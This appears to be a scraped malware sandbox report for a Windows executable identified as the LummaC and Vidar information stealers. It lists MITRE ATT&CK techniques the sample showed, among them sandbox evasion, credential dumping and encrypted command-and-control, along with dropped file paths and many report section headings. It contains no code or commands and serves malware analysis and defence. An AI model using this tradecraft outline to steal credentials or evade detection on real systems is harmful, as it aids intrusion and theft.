Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1lKbb2hF7fYToopfpmEvlyRN.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\DBAAFIDGDA.exe

C:\ProgramData\DBAAFIDGDAAA\BFHDAE

C:\ProgramData\DBAAFIDGDAAA\BFHDAE-shm

C:\ProgramData\DBAAFIDGDAAA\CBAKJK

C:\ProgramData\DBAAFIDGDAAA\CFHCGH

C:\ProgramData\DBAAFIDGDAAA\FCAFIJ

C:\ProgramData\DBAAFIDGDAAA\FHCAEG

Windows Analysis Report
1lKbb2hF7fYToopfpmEvlyRN.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre